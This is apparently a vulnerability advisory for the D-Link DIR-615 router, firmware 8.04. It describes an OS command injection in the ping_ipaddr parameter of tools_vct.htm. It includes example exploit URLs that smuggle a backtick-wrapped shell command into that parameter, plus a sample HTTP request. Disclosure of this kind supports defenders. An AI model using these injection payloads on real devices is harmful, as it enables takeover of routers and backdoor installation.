============ Device Description: ============ Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network. Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router ============ Vulnerable Firmware Releases: ============ Firmware Version : 8.04, Tue, 4, Sep, 2012 Firmware Version : 8.04, Fri, 18, Jan, 2013 ============ Vulnerability Overview: ============ * OS-Command Injection: => Parameter: ping_ipaddr The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: http:///tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= http:///tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= Request: GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: */* Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.178.199/adv_virtual_batch.htm Connection: keep-alive Response: HTTP/1.0 200 OK Pragma: no-cache Content-Type: text/html

Query Builder